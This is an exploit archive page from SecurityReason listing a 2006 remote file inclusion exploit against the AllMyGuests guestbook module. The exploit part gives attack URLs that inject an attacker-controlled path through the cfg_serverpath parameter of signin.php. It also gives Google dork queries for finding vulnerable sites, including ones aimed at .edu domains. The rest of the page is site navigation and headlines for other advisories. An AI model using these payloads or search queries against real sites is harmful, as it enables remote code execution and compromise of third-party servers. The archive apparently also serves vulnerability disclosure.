SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

AllMyGuests <= 0.4.1 (cfg_serverpath) Remote File Include Vulnerability


Arrow  ExploitAlert : 1216
Arrow  Credit : Br@Him
Arrow  Date : 21.09.2006

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

#==========================================================================
==#
#
# AllMyGuests => ?_AMGconfig[cfg_serverpath] Remote File Inclusion
Exploit
#==========================================================================
==#
#
# Scirpt Infected signin.php
#
# Critical level : Dangerous
#==========================================================================
==#
#
# By Br@Him Ma-Edition
#==========================================================================
==#
#
# Http://www.Af-Team.com
#
# Arabian-FighterZ Crew
#
#
#
#
#==========================================================================
===#
#
#
# Exploit:
###########################################################################
########################
#
# Http://www.Victime.com/modules.php?name=allmyguests
#
http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serve
rpath]=Attacker
#
#
# Search Google ( Nuke ET Copyright © 2004 por Truzone. )
# ( allinurl:*.edu.*/modules.php?name=allmyguests )
# ( "powered by AllMyGuests" )
#
# To Contact: Brahim@legenie.net or Brahim118@yahoo.fr
#
# Greet : Silitoad STr0ke. Sn1p8r. Ope3runix . Simo64 .The_Condor.r00ted .
Silitix . Zakix .Daftrix.
# Oli Nsinah lmera lmajia :P
###########################################################################
########################
By Morocco

Notes:
Nuke module as well as the standalone is vulnerable.
http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serve
rpath]=Attacker
http://www.vicitime.com/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=A
ttacker
/str0ke





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.